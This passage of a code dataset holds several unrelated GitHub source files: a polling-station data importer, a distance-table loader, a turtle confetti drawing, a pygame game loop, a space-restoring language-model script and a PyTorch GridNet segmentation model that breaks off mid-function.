too'''\n#\n# if message.text == \"Привет\":\n# bot.send_message(message.from_user.id, \"Привет чем могу помочь?\")\n# elif message.text ==\"/help\":\n# bot.send_message(message.from_user.id, \"Напиши привет\")\n# else:\n# bot.send_message(message.from_user.id, \"Я тебя не помню напиши '/help'\")\n\n\n\"\"\"Проверка новых сообщений\"\"\"\nbot.polling(none_stop=True, interval=0)\n\n","repo_name":"IvanZhdaniuk/bot_shop_sells","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6509828066","text":"from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"WIL\"\n addresses_name = \"2021-07-26/WiltsDemocracy_Club__19August2021.tsv\"\n stations_name = \"2021-07-26/WiltsDemocracy_Club__19August2021.tsv\"\n elections = [\"2021-08-19\"]\n csv_delimiter = \"\\t\"\n\n # Checked 63862 (out of council area) and 64258/64219 proximity.\n\n # These were found because they weren't geocodeable, and so are presumably wrong\n station_postcode_fixes = {\n # Easterton Village Hall, Easterton, Devizes\n # https://wvha.org.uk/listing/easterton-village-hall/\n (\"63510\", \"SN10 4P\"): \"SN10 4PS\",\n # Edington Parish Hall, Edington, Westbury\n (\"64399\", \"\"): \"\",\n # Tidworth Community Centre, Wylye Road Tidworth\n # https://tidworthtowncouncil.gov.uk/tidworth-community-centre/\n (\"63590\", \"SP9 7QH\"): \"SP9 7QQ\",\n # Beanacre Church Schoolroom, Beanacre, Melksham\n (\"64478\", \"SN12\"): \"\",\n # Great Bedwyn Cricket Club, Frog Lane, Great Bedwyn, Marlborough\n # http://www.wccl.org.uk/team_info.php?id=1247\n (\"63542\", \"SN8 3PD\"): \"SN8 3PB\",\n # Wilton Community Centre, West Street, Wilton, Salisbury\n # https://wvha.org.uk/listing/wilton-community-centre/\n (\"63870\", \"SP2 0DJ\"): \"SP2 0DG\",\n # Easton Royal Village Hall, Easton Royal, Pewsey\n # https://wvha.org.uk/listing/easton-royal-village-hall/\n (\"63514\", \"\"): \"SN9 5LY\",\n # Baydon Young Peoples Hall, Baydon, Marlborough\n # http://www.baydon.org/BYPA.htm\n (\"63447\", \"\"): \"SN8 2JE\",\n }\n\n def station_record_to_dict(self, record):\n if (\n record.polling_place_id,\n record.polling_place_postcode,\n ) in self.station_postcode_fixes:\n record = record._replace(\n polling_place_postcode=self.station_postcode_fixes[\n (record.polling_place_id, record.polling_place_postcode)\n ]\n )\n\n return super().station_record_to_dict(record)\n\n #\n def address_record_to_dict(self, record):\n if record.addressline6.strip() in [\n \"SN8 4AF\",\n \"SN10 4AD\",\n \"SN10 3SQ\",\n \"SN8 1QB\",\n \"SP4 9QE\",\n \"SN10 3DD\",\n \"SN10 5HE\",\n \"SN10 2PA\",\n \"SN8 3DY\",\n \"SP5 2BZ\",\n \"SP5 2NL\",\n \"SP5 2DT\",\n \"SP4 8JD\",\n \"SP4 7PB\",\n \"SN11 0PQ\",\n \"SN5 0AB\",\n \"SN16 9ES\",\n \"BA13 4LY\",\n \"SN15 3SX\",\n \"SN11 8EJ\",\n \"SN15 5EY\",\n \"BA14 7DW\",\n \"SP4 7FF\",\n \"SN15 3RW\",\n \"SN5 4HB\",\n \"SN8 4NR\",\n \"SN14 6HT\",\n \"SN10 3EZ\",\n \"SP3 6DY\",\n \"SN10 4QP\",\n \"SN8 1HG\",\n ]:\n return None # split\n\n return super().address_record_to_dict(record)\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_importers/management/commands/import_wiltshire.py","file_name":"import_wiltshire.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"13300243564","text":"import csv\n\ndistance_table = {}\n\n\ndef load_distance_table_data(distance_file):\n \"\"\"Takes a CSV file and converts it into a nested dictionary\n\n The first for loop will add the distances in miles to each row. The second for loop ensures that each row has\n the same number of distances to and from each address\n\n Args:\n distance_file: This argument is a CSV file to be converted to a nested dictionary\n\n Returns:\n distance_table: This function returns a nested dictionary\n\n Raises:\n N/A: This function raises no errors/has no error checking\n\n Time complexity: Because of the nested for loop, it's time complexity is O(n^2)\n Space complexity: Because of the nested for loop the space complexity is O(n^2)\n \"\"\"\n with open(distance_file) as distances:\n rows = list(csv.reader(distances))\n cols = [row[0] for row in rows]\n for row in rows:\n distance_table[row[0]] = {}\n for i, v in enumerate(row[1:]):\n distance_table[row[0]][cols[i]] = float(v if v else 0)\n for a in cols:\n for b in cols:\n if distance_table[a][b]:\n distance_table[b][a] = distance_table[a][b]\n else:\n distance_table[a][b] = distance_table[b][a]\n return distance_table\n","repo_name":"alexhenson/Automated-Package-Delivery","sub_path":"libraries/load_distance_table_data.py","file_name":"load_distance_table_data.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38260839640","text":"import turtle\nimport random\n\nnumberOfConfetti = 200\n\ncolors = ['aliceblue', 'antiquewhite', 'aqua', 'aquamarine', 'azure', 'beige', 'bisque', 'black', 'blanchedalmond',\n 'blue', 'blueviolet', 'brown', 'burlywood', 'cadetblue', 'chartreuse', 'chocolate', 'coral', 'cornflowerblue',\n 'cornsilk', 'crimson', 'cyan', 'darkblue', 'darkcyan', 'darkgoldenrod', 'darkgray', 'darkgreen', 'darkkhaki',\n 'darkmagenta', 'darkolivegreen', 'darkorange', 'darkorchid', 'darkred', 'darksalmon', 'darkseagreen',\n 'darkslateblue', 'darkslategray', 'darkturquoise', 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray',\n 'dodgerblue', 'firebrick', 'floralwhite', 'forestgreen', 'fuchsia', 'gainsboro', 'ghostwhite', 'gold',\n 'goldenrod', 'gray', 'green', 'greenyellow', 'honeydew', 'hotpink', 'indianred', 'indigo', 'ivory', 'khaki',\n 'lavender', 'lavenderblush', 'lawngreen', 'lemonchiffon', 'lightblue', 'lightcoral', 'lightcyan',\n 'lightgoldenrodyellow', 'lightgreen', 'lightgray', 'lightpink', 'lightsalmon', 'lightseagreen', 'lightskyblue',\n 'lightslategray', 'lightsteelblue', 'lightyellow', 'lime', 'limegreen', 'linen', 'magenta', 'maroon',\n 'mediumaquamarine', 'mediumblue', 'mediumorchid', 'mediumpurple', 'mediumseagreen', 'mediumslateblue',\n 'mediumspringgreen', 'mediumturquoise', 'mediumvioletred', 'midnightblue', 'mintcream', 'mistyrose', 'moccasin',\n 'navajowhite', 'navy', 'oldlace', 'olive', 'olivedrab', 'orange', 'orangered', 'orchid', 'palegoldenrod',\n 'palegreen', 'paleturquoise', 'palevioletred', 'papayawhip', 'peachpuff', 'peru', 'pink', 'plum', 'powderblue',\n 'purple', 'red', 'rosybrown', 'royalblue', 'saddlebrown', 'salmon', 'sandybrown', 'seagreen', 'seashell', 'sienna',\n 'silver', 'skyblue', 'slateblue', 'slategray', 'snow', 'springgreen', 'steelblue', 'tan', 'teal', 'thistle',\n 'tomato', 'turquoise', 'violet', 'white', 'whitesmoke', 'yellow', 'yellowgreen']\n\nnum = random.randrange(len(colors))\n\nmyPen = turtle.Turtle()\nmyPen.hideturtle()\nmyPen.speed(0)\nwindow = turtle.Screen()\nwindow.bgcolor(\"#ffffff\")\n\nmyPen.pensize(1)\nradius = 9 # Radius of a confetti, in pixels\nlist = []\n\ndef addText(x, y, text, color, size):\n myPen.penup()\n myPen.goto(x, y)\n myPen.pendown()\n myPen.color(color)\n myPen.write(text, None, align=\"center\", font=(\"Times\", size, \"normal\"))\n\n# Add Confetti\nfor confetti in range(0, numberOfConfetti):\n overlap = True\n while overlap:\n x = random.randint(-180 + radius, 180 - radius)\n y = random.randint(-180 + radius, 180 - radius)\n # Check if new confetti overlap with any existing confetti\n overlap = False\n for confetti in list:\n # Use Pythagoras Formula to calculate the distance between two confetti\n distance = ((confetti[0] - x) ** 2 + (confetti[1] - y) ** 2) ** 0.5\n # If two confetti are too close to each other, then they will overlap!\n if distance <= (2 * radius) + 2:\n overlap = True\n\n list.append([x, y])\n\n addText(0, 40, \"HAPPY\", 'black', \"45\")\n addText(0, 0, \"100 DAYS\", 'purple', \"45\")\n addText(0, -40, \"OF CODING!\", 'black', \"45\")\n\n # Generate a random colour!\n num = random.randrange(0, len(colors), 1)\n myPen.penup()\n myPen.goto(x, y - radius)\n myPen.pendown()\n myPen.fillcolor(colors[num])\n myPen.color(colors[num])\n myPen.begin_fill()\n myPen.circle(radius - 2)\n myPen.end_fill()\n print(str(len(list)) + \" confetti\")\n","repo_name":"cavmp/200DaysofCode","sub_path":"Day100-Confetti.py","file_name":"Day100-Confetti.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16468412581","text":"import sys\nimport pygame\nimport time\nimport numpy\n\nfrom pygame.locals import *\n\nfrom create_box import create_box\nfrom create_box import load_box\nfrom path_finder import find_path\n\npygame.init()\n\n########\n#CONSTS#\n########\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nYELLOW = (255, 255, 0)\nCYAN = (0, 255, 255)\nPURPLE = (255, 0, 255)\n\n# matrix generation #\n#####################\n \nDIM_X = 1024\nDIM_Y = 728\n\nMATRIX = []\n\n#a = (579,407)\n#b = (595,480)\nouta = (566,398),(586,418)\nina = (586,418),(566,398)\noutb = (586,486),(611,468)\ninb = (611,468),(586,486)\nline1 = (1, (outa,2))\nline2 = (2, (ina,1),(inb,3))\nline3 = (3, (outb,2))\nDATA = ( line1, line2, line3 )\n\n#####################\n\nBACKGROUND_SOURCE = 'images/background.png'\nBACKGROUND_IMG = pygame.image.load(BACKGROUND_SOURCE)\nBACKGROUND_POSX = -100\nBACKGROUND_POSY = -120\nMAP_WID = 1024\nMAP_HEI = 768\nSTEP = 1\n\nWINDOW_RESOLUTION = (550, 450)\nWINDOW_CENTER = [int(WINDOW_RESOLUTION[0]/2), int(WINDOW_RESOLUTION[1]/2)]\nHERO_POSITION = [BACKGROUND_POSX + int(WINDOW_RESOLUTION[0]/2), BACKGROUND_POSY + int(WINDOW_RESOLUTION[1]/2)]\nWINDOW_NAME = \"OurGame\"\nFPS = 60\n\nHERO_SPEED = 25\nHERO_WALK = 1\nHERO_RUN = 2\n\nsetDisplay = pygame.display.set_mode(WINDOW_RESOLUTION)\npygame.display.set_caption(WINDOW_NAME)\n\n###########################################\n\nTABLE_SOURCE = 'images/edit_table1.png'\nTABLE_IMG = pygame.image.load(TABLE_SOURCE)\nTABLE_POSX = 270\nTABLE_POSY = 220\n\n###########################################\n\ndef detectDoubleClick():\n initTime = time.clock()\n while time.clock() - initTime < 0.15:\n for event in pygame.event.get([MOUSEBUTTONDOWN]):\n if event.type == MOUSEBUTTONDOWN:\n return True\n return False\n\ndef loadGame():\n global MATRIX\n notReady = True\n setDisplay.fill(BLACK)\n pygame.draw.rect(setDisplay, RED, (int(WINDOW_RESOLUTION[0]/8), int(WINDOW_RESOLUTION[1]/4)*3, int(WINDOW_RESOLUTION[0]/8)*6, int(WINDOW_RESOLUTION[1]/8)), 2)\n pygame.display.update()\n #pygame.time.wait(500)\n MATRIX = load_box( DIM_X , DIM_Y , \"map_input.txt\" )\n\n for i in range(1, 7):\n pygame.draw.rect(setDisplay, WHITE, (int(WINDOW_RESOLUTION[0]/8), int(WINDOW_RESOLUTION[1]/4)*3, int(WINDOW_RESOLUTION[0]/8)*i, int(WINDOW_RESOLUTION[1]/8)))\n pygame.draw.rect(setDisplay, RED, (int(WINDOW_RESOLUTION[0]/8), int(WINDOW_RESOLUTION[1]/4)*3, int(WINDOW_RESOLUTION[0]/8)*6, int(WINDOW_RESOLUTION[1]/8)), 2)\n pygame.display.update()\n pygame.time.wait(100)\n\ndef screenBoundsCheck(minus = False, axisX = False, axisY = False):\n global BACKGROUND_POSX, BACKGROUND_POSY\n if minus:\n if (BACKGROUND_POSX - STEP + MAP_WID >= WINDOW_RESOLUTION[0]) and axisX:\n BACKGROUND_POSX -= STEP\n if (BACKGROUND_POSY - STEP + MAP_HEI >= WINDOW_RESOLUTION[1]) and axisY:\n BACKGROUND_POSY -= STEP\n else:\n if (BACKGROUND_POSX + STEP <= 0) and axisX:\n BACKGROUND_POSX += STEP\n if (BACKGROUND_POSY + STEP <= 0) and axisY:\n BACKGROUND_POSY += STEP\n\ndef translate(x , y):\n global BACKGROUND_POSX\n global BACKGROUND_POSY\n return (int(x - BACKGROUND_POSX),int(y - BACKGROUND_POSY))\n\n\nfrom engineClass import dynamicObject\nfrom engineClass import staticObject\nnpc2 = dynamicObject('Stworek2', (655,415)) # 655,415\n#GAME_OBJECTS = {npc1.getPosition():npc1}\nGAME_OBJECTS = [npc2]\n\nnpc1 = dynamicObject('Potworek2', (655,415))\nnpc2 = dynamicObject('Stworek2', (360, 400))\nnpc3 = dynamicObject('Horrorek3', (484, 541))\nhero = dynamicObject('Hero', (WINDOW_CENTER[0]-BACKGROUND_POSX, WINDOW_CENTER[1]-BACKGROUND_POSY))\nSTATIC_OBJECTS = [0]\nSTATIC_OBJECTS = STATIC_OBJECTS + [ staticObject('Stol', (TABLE_POSX, TABLE_POSY) , -1, TABLE_IMG) ]\n\nSTANDING_POINTS = [0]\nSTANDING_POINTS = STANDING_POINTS + [ (316,325) ]\n\n#GAME_OBJECTS = {npc1.getPosition():npc1}\nGAME_OBJECTS = [npc1, npc2, npc3]\nfor e in GAME_OBJECTS:\n e.setTarget(390, 340)\n\ndef sigKill():\n pygame.quit()\n sys.exit()\n\nhere = 0\n\ndef drawGame():\n global BACKGROUND_POSX\n global BACKGROUND_POSY\n\n #hero moving\n correction = -1\n if (hero.move(MATRIX, DATA)):\n correction = 0\n heroPos = hero.getPosition()\n heroX = int(heroPos[0] + BACKGROUND_POSX)\n heroY = int(heroPos[1] + BACKGROUND_POSY)\n BACKGROUND_POSX = - heroPos[0] + WINDOW_CENTER[0]\n BACKGROUND_POSY = - heroPos[1] + WINDOW_CENTER[1]\n\n #our weird background a\n setDisplay.blit(BACKGROUND_IMG,(BACKGROUND_POSX, BACKGROUND_POSY))\n\n\n\n mousePosition = pygame.mouse.get_pos()\n matrixPosition = MATRIX[ mousePosition[0] - BACKGROUND_POSX][mousePosition[1] - BACKGROUND_POSY ]\n for i in range(1,len(STATIC_OBJECTS)):\n if ( matrixPosition == -i ):\n setDisplay.blit(STATIC_OBJECTS[i].getGraphic(), (BACKGROUND_POSX+STATIC_OBJECTS[i].getPosition()[0]+correction, BACKGROUND_POSY+STATIC_OBJECTS[i].getPosition()[1]+correction))\n if ( heroPos == STANDING_POINTS[i] and here == 0):\n print(\"DOSZEDL!\")\n global here\n here = 1\n #TUUUUUUTAJ WYSWIETLENIE OKIENKA\n\n pygame.draw.circle(setDisplay, RED, (heroX, heroY), 10)\n\n #gameObjects\n for npc in GAME_OBJECTS:\n npc.move(MATRIX,DATA)\n npcPos = npc.getPosition()\n npcX = int(npcPos[0] + BACKGROUND_POSX + correction)\n npcY = int(npcPos[1] + BACKGROUND_POSY + correction)\n pygame.draw.circle(setDisplay, GREEN, (npcX, npcY), 5)\n\n\n pygame.display.update()\n FPS_TIME.tick(FPS)\n\ndef runGame():\n global BACKGROUND_POSX\n global BACKGROUND_POSY\n global HERO_SPEED\n while True:\n #events\n for event in pygame.event.get():\n #print event\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEBUTTONDOWN:\n #checking for double click\n if detectDoubleClick():\n #HERO_SPEED = HERO_RUN\n hero.setStep(HERO_RUN)\n else:\n #HERO_SPEED = HERO_WALK\n hero.setStep(HERO_WALK)\n\n\n mousePosition = pygame.mouse.get_pos() # (x, y)\n hero.setTarget(translate(mousePosition[0], mousePosition[1])[0],translate(mousePosition[0], mousePosition[1])[1])\n global here\n here = 0\n matrixPosition = MATRIX[ mousePosition[0] - BACKGROUND_POSX][mousePosition[1] - BACKGROUND_POSY ]\n for i in range(1,len(STATIC_OBJECTS)): # przeszukiwanie tablicy obiektow statycznych\n if ( matrixPosition == -i ):\n hero.setTarget(STANDING_POINTS[i][0],STANDING_POINTS[i][1])\n\n\n\n\n keys = pygame.key.get_pressed()\n if keys[K_UP] or keys[K_w]:\n #BACKGROUND_POSY += STEP\n screenBoundsCheck(False, False, True)\n HERO_POSITION[1] += STEP\n elif keys[K_DOWN] or keys[K_s]:\n #BACKGROUND_POSY -= STEP\n screenBoundsCheck(True, False, True)\n HERO_POSITION[1] -= STEP\n if keys[K_LEFT] or keys[K_a]:\n #BACKGROUND_POSX += STEP\n screenBoundsCheck(False, True, False)\n HERO_POSITION[0] += STEP\n elif keys[K_RIGHT] or keys[K_d]:\n #BACKGROUND_POSX -= STEP\n screenBoundsCheck(True, True, False)\n HERO_POSITION[0] -= STEP\n \n drawGame()\n \n#loadGame()\n\nwhile True:\n global FPS_TIME\n FPS_TIME = pygame.time.Clock()\n loadGame()\n runGame()\n ","repo_name":"maciex006/OurGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1503251112","text":"import sys\nsys.path.insert(1, '../')\nfrom nlm import NLM\nfrom math import log\n\npath = './test.txt.nospaces'\n\nif __name__ == \"__main__\":\n \n NLM.load(\"huge\")\n\n f = open(path,'r')\n\n h = NLM()\n\n for line in f.readlines():\n beam = [(0, h)]\n b = 20\n for c in list(line[:-1]) + [\"\"]:\n newbeam = []\n for score, state in beam:\n newscore = score + log(state.next_prob(c))\n newstate = state + c\n newbeam.append((newscore, newstate))\n\n newscore = score + log(state.next_prob(\"_\")) + log((state+\"_\").next_prob(c))\n newstate = state + '_' + c\n newbeam.append((newscore, newstate))\n\n beam = sorted(newbeam, reverse = True)[:b]\n\n score, state = beam[0]\n print(\" \".join(state.history).replace('', '').replace('', '').replace(' ', '').replace('_', ' '))\n","repo_name":"jshota/cs539-group_assignments","sub_path":"hw6/hw6-data/restore_spaces.py","file_name":"restore_spaces.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30936499573","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models\nfrom nets.vgg import *\nfrom net_utils import *\nfrom losses import *\n\nMODE_LIST = ['s2s', 'x2x', 'xs2s', 'xs2x']\n\nmean = torch.FloatTensor([0.485, 0.456, 0.406]).view([1,3,1,1])\nstd = torch.FloatTensor([0.229, 0.224, 0.225]).view([1,3,1,1])\n\n\nclass Lateral(nn.Module):\n\tdef __init__(self, in_channel, kernel_size, out_channel=None, shortcut_conv=False, prelu=True):\n\t\tsuper(Lateral, self).__init__()\n\t\tif out_channel is None:\n\t\t\tout_channel = in_channel\n\t\tself.in_channel = in_channel\n\t\tself.out_channel = out_channel\n\t\tself.kernel_size = kernel_size\n\t\tif prelu:\n\t\t\tself.net = nn.Sequential(\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t\t)\t\t\n\t\telse:\n\t\t\tself.net = nn.Sequential(\n\t\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t\t)\t\n\t\tif (self.out_channel != self.in_channel) and shortcut_conv:\n\t\t\tself.conv = nn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t# normal_init_net_conv(self.net)\n\t\tself.shortcut_conv = shortcut_conv\n\t\t\t\n\tdef forward(self, input):\n\t\tassert input.size(1) == self.in_channel, [ input.size(1), self.in_channel ]\n\t\tif self.shortcut_conv:\n\t\t\tif self.out_channel != self.in_channel:\n\t\t\t\treturn self.net(input) + self.conv(input)\n\t\t\telse:\n\t\t\t\treturn self.net(input) + input\n\t\telse:\n\t\t\treturn self.net(input) \n\nclass Upsample(nn.Module):\n\tdef __init__(self, in_channel, out_channel, kernel_size=3):\n\t\tsuper(Upsample, self).__init__()\n\t\tself.in_channel = in_channel\n\t\tself.out_channel = out_channel\n\t\tself.kernel_size = kernel_size\n\t\tself.net = nn.Sequential(\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t)\n\t\t# normal_init_net_conv(self.net)\n\n\tdef forward(self, input):\n\t\tassert input.size(1) == self.in_channel, [ input.size(1), self.in_channel ]\n\t\treturn self.net(F.interpolate(input, scale_factor=2, mode='bilinear', align_corners=True))\n\n\nclass Downsample(nn.Module):\n\tdef __init__(self, in_channel, out_channel, kernel_size=3):\n\t\tsuper(Downsample, self).__init__()\n\t\tself.in_channel = in_channel\n\t\tself.out_channel = out_channel\n\t\tself.kernel_size = kernel_size\n\t\tself.net = nn.Sequential(\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=2, padding=kernel_size//2),\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t)\n\t\t# normal_init_net_conv(self.net)\n\n\tdef forward(self, input):\n\t\tassert input.size(1) == self.in_channel, [ input.size(1), self.in_channel ]\n\t\treturn self.net(input)\n\n\nclass Downflow(nn.Module):\n\tdef __init__(self, in_channels, kernel_size=3):\n\t\tsuper(Downflow, self).__init__()\n\t\tself.in_channels = in_channels\n\t\tself.row0 = Lateral(in_channels[0], kernel_size, shortcut_conv=False)\n\t\tself.row1 = Lateral(in_channels[1], kernel_size, shortcut_conv=False)\n\t\tself.row2 = Lateral(in_channels[2], kernel_size, shortcut_conv=False)\n\t\tself.down01 = Downsample(in_channels[0], in_channels[1])\n\t\tself.down12 = Downsample(in_channels[1], in_channels[2])\n\n\tdef forward(self, row0_input, row1_input, row2_input):\n\t\tassert row0_input.size(1) == self.in_channels[0], [ row0_input.size(1), self.in_channels[0] ]\n\t\tassert row1_input.size(1) == self.in_channels[1], [ row1_input.size(1), self.in_channels[1] ]\n\t\tassert row2_input.size(1) == self.in_channels[2], [ row2_input.size(1), self.in_channels[2] ]\n\n\t\trow0_output = self.row0(row0_input)\n\t\trow1_output = self.row1(row1_input)\n\t\trow2_output = self.row2(row2_input)\n\n\t\trow1_output = self.down01(row0_output) + row1_output\n\t\trow2_output = self.down12(row1_output) + row2_output\n\n\t\treturn row0_output, row1_output, row2_output\n\n\nclass Upflow(nn.Module):\n\tdef __init__(self, in_channels, kernel_size=3):\n\t\tsuper(Upflow, self).__init__()\n\t\tself.in_channels = in_channels\n\t\tself.row0 = Lateral(in_channels[0], kernel_size, shortcut_conv=False)\n\t\tself.row1 = Lateral(in_channels[1], kernel_size, shortcut_conv=False)\n\t\tself.row2 = Lateral(in_channels[2], kernel_size, shortcut_conv=False)\n\t\tself.up10 = Upsample(in_channels[1], in_channels[0])\n\t\tself.up21 = Upsample(in_channels[2], in_channels[1])\n\n\tdef forward(self, row0_input, row1_input, row2_input):\n\t\tassert row0_input.size(1) == self.in_channels[0], [ row0_input.size(1), self.in_channels[0] ]\n\t\tassert row1_input.size(1) == self.in_channels[1], [ row1_input.size(1), self.in_channels[1] ]\n\t\tassert row2_input.size(1) == self.in_channels[2], [ row2_input.size(1), self.in_channels[2] ]\n\n\t\trow0_output = self.row0(row0_input)\n\t\trow1_output = self.row1(row1_input)\n\t\trow2_output = self.row2(row2_input)\n\n\t\trow1_output = self.up21(row2_output) + row1_output\n\t\trow0_output = self.up10(row1_output) + row0_output\n\t\t\n\t\treturn row0_output, row1_output, row2_output\n\n\nclass GridNet(nn.Module):\n\tdef __init__(self, n_channels, n_classes, mode='s2s', split_tail=False, seg_id=False):\n\t\tsuper(GridNet, self).__init__()\n\t\tself.mode = mode\n\t\tself.CELoss = nn.CrossEntropyLoss()\n\t\tself.SSIMLoss = SSIM()\n\t\tself.seg_act = nn.Softmax(dim=1)\n\t\tself.split_tail = split_tail\n\t\tself.seg_id = seg_id\n\t\tif mode == 'x2x':\n\t\t\tself.in_channel = 3*2\n\t\t\tself.out_channel = 3\n\t\telif mode == 'xs2x':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\telse:\n\t\t\t\tself.in_channel = (3+1)*2\n\t\t\tself.out_channel = 3\n\t\telif mode == 's2s':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = n_classes*2\n\t\t\t\tself.out_channel = n_classes\n\t\t\telse:\n\t\t\t\tself.in_channel = 2\n\t\t\t\tself.out_channel = n_classes\t\t\t\t\n\t\telif mode == 'xs2s':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\t\tself.out_channel = n_classes\n\t\t\telse:\n\t\t\t\tself.in_channel = (3+1)*2\n\t\t\t\tself.out_channel = n_classes\n\t\telif mode == 'xs2xs':\n\t\t\tif not split_tail:\n\t\t\t\tif not seg_id:\n\t\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\t\t\tself.out_channel = (3+n_classes)\n\t\t\t\telse:\n\t\t\t\t\tself.in_channel = (3+1)*2\n\t\t\t\t\tself.out_channel = 3+n_classes\n\t\t\telse:\n\t\t\t\tif not seg_id:\n\t\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\t\t\tself.out_channel = 3\n\t\t\t\t\tself.out_channel_seg = n_classes\n\t\t\t\telse:\n\t\t\t\t\tself.in_channel = (3+1)*2\n\t\t\t\t\tself.out_channel = 3\n\t\t\t\t\tself.out_channel_seg = n_classes\n\t\telif mode == 'wing':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = (3+n_classes)*2 + 3\n\t\t\t\tself.out_channel = n_classes\n\t\t\telse:\n\t\t\t\tself.in_channel = (3 + 1)*2 + 3\n\t\t\t\tself.out_channel = n_classes\n\n\t\telse:\n\t\t\traise Exception(\"mode doesnt exist !\")\n\n\t\tself.n_channels = n_channels\n\t\tself.head = Lateral(self.in_channel, 3, n_channels[0], shortcut_conv=True, prelu=False)\n\n\t\t# nn.Sequential(\n\t\t# \tnn.PReLU(),\n\t\t# \tnn.Conv2d(self.in_channel, n_channels[0], 3, stride=1, padding=1),\n\t\t# \tnn.PReLU(),\n\t\t# \tnn.Conv2d(n_channels[0], n_channels[0], 3, stride=1, padding=1)\n\t\t# \t)\n\n\t\tself.neck_down01 = Downsample(n_channels[0], n_channels[1], 3)\n\t\tself.neck_down12 = Downsample(n_channels[1], n_channels[2], 3)\n\n\t\tself.body_down0 = Downflow(n_channels, 3)\n\t\tself.body_down1 = Downflow(n_channels, 3)\n\n\t\tself.body_up0 = Upflow(n_channels, 3)\n\t\tself.body_up1 = Upflow(n_channels, 3)\n\t\tself.body_up2 = Upflow(n_channels, 3)\n\n\t\tself.tail = Lateral(n_channels[0], 3, self.out_channel, shortcut_conv=False, prelu=True)\n\t\tif self.split_tail:\n\t\t\tself.tail_seg = Lateral(n_channels[0], 3, self.out_channel_seg, shortcut_conv=False, prelu=True)\n\n\t\tif self.mode[-1] == 'x' or self.mode == 'xs2xs':\n\t\t\tvgg19 = torchvision.models.vgg19(pretrained=True)\n\t\t\tself.vgg_net = my_vgg(vgg19)\n\t\t\tfor param in self.vgg_net.parameters():\n\t\t\t\tparam.requires_grad = False\n\n\n\tdef GDLLoss(self, input, gt):\n\t\tbs, c, h, w = input.size()\n\n\t\tw_gdl = torch.abs(input[:,:,:,1:] - input[:,:,:,:w-1])\n\t\th_gdl = torch.abs(input[:,:,1:,:] - input[:,:,:h-1,:])\n\n\t\tgt_w_gdl = torch.abs(gt[:,:,:,1:] - gt[:,:,:,:w-1])\n\t\tgt_h_gdl = torch.abs(gt[:,:,1:,:] - gt[:,:,:h-1,:])\n\t\t\n\t\tloss = torch.mean(torch.abs(w_gdl-gt_w_gdl)) + torch.mean(torch.abs(h_gdl-gt_h_gdl))\n\t\treturn loss\n\n\tdef _normalize(self, x):\n\t\tgpu_id = x.get_device()\n\t\treturn (x - mean.cuda(gpu_id)) / std.cuda(gpu_id)\n\n\tdef VGGLoss(self, pred_feat, true_feat):\n\t\tloss = 0\n\t\tfor i in range(len(pred_feat)):\n\t\t\tloss += (true_feat[i] - pred_feat[i]).abs().mean()\n\t\treturn loss/len(pred_feat)\n\n\tdef L1Loss(self, input, gt):\n\t\ttheta = 0.001\n\t\t# fg_indices = [4,5,6,7,11,12,13,14,15,16,17,18]\n\t\tdiff = (input-gt)**2\n\t\t# diff[:,fg_indices] = 4*diff[:,fg_indices]\n\t\treturn torch.sqrt(diff + theta**2)\n\n\n\tdef forward(self, input, gt=None):\n\t\tassert input.size(1) == self.in_channel, [input.size(), self.in_channel]\n\n\t\t# change to anqi test method\n\t\t# if self.mode=='xs2xs':\n\t\t# \tinput[:,:6] = postprocess_output(input[:,:6])\n\t\t# \tgt[:,:3] = 